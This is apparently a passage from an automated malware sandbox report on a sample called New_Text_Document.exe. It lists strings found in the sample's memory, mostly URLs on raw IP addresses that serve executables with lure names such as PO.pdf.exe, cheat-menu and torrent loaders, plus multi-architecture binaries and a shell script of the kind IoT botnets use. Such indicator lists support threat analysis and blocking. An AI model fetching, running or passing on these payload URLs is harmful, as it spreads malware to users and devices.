                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.24.244/Z2KNEW/Ivnut-Z2K-3.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.24.244/Z2KNEW/Mfceum-4.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.24.244/Z2KNEW/Rrobknnz-Z2K.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.24.244/Z2KNEW/Z2K-1.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.24.244/autotask/Eppzjtedzmk.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.24.244/autotask/Moriwnrn.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.24.244/autotask/overlaycrypt.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.24.244/cheat-menu/CHEAT-MENU-LINK-1.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.24.244/limetor/Kgilth-LIME-2.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.24.244/limetor/Kgilth-LIME-3.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.24.244/limetor/Rrobknnz-LIMETORRENTS.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.24.244/newz2k/Ivnut-Z2K-2.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.24.244/newz2k/Ivnut-Z2K-3.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.24.244/newz2k/Mfceum-4.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.24.244/newz2k/Rrobknnz-Z2K.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.24.244/newz2k/Z2K-1.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.24.244/tpb-2-links/ntprfgupx-1.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.24.244/update/Rrobknnz-TPB.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.24.244/update/TPB-1.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.25.85/armv4l
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.25.85/armv5l
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.25.85/armv6l
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.25.85/eskgbins.sh
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.25.85/i586
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.25.85/i686
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.25.85/m68k
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.25.85/mips
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.25.85/mipsel
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.25.85/powerpc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.25.85/sh4
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.25.85/sparc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.25.85/x86
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.27.15/secured/wp/DH.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.27.15/secured/wp/Order.img
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.27.15/secured/wp/PO.pdf.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.27.15/secured/wp/aao.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.214.27.15/secured/wp/raaa.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.229.150.6:5554/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.229.5.214:40044/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.229.87.15:18367/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.230.237.113:65085/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.235.116.125:43852/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.237.14.243:7717/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.241.232.238:42143/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.254.142.70:20455/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.255.130.177:52804/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.38.24.186:2127/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.42.33.110:14407/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.43.99.79:59588/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.70.220.103:46111/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.76.80.232:45640/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.91.96.123:63548/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://96.11.111.179:4275/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://96.230.131.50:27833/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://96.246.139.49:46140/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://96.47.147.169:27086/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://96.54.108.39:62103/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://96.56.171.198:63232/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://96.64.238.12:34574/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://96.69.95.138:57827/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://96.75.30.141:43961/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://96.75.82.93:21905/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://96.90.19.198:53744/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.113.151.173:34103/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.113.166.235:62257/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.113.182.208:1487/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.113.53.200:19303/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.14.183.227:64179/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.14.30.176:21298/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.227.194.36:11110/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.249.227.120:40984/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.26.173.171:46646/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://99.107.113.242:10916/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://99.122.11.106:24434/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://99.157.104.219:54964/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://99.157.23.199:42146/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://99.158.27.28:59195/.i
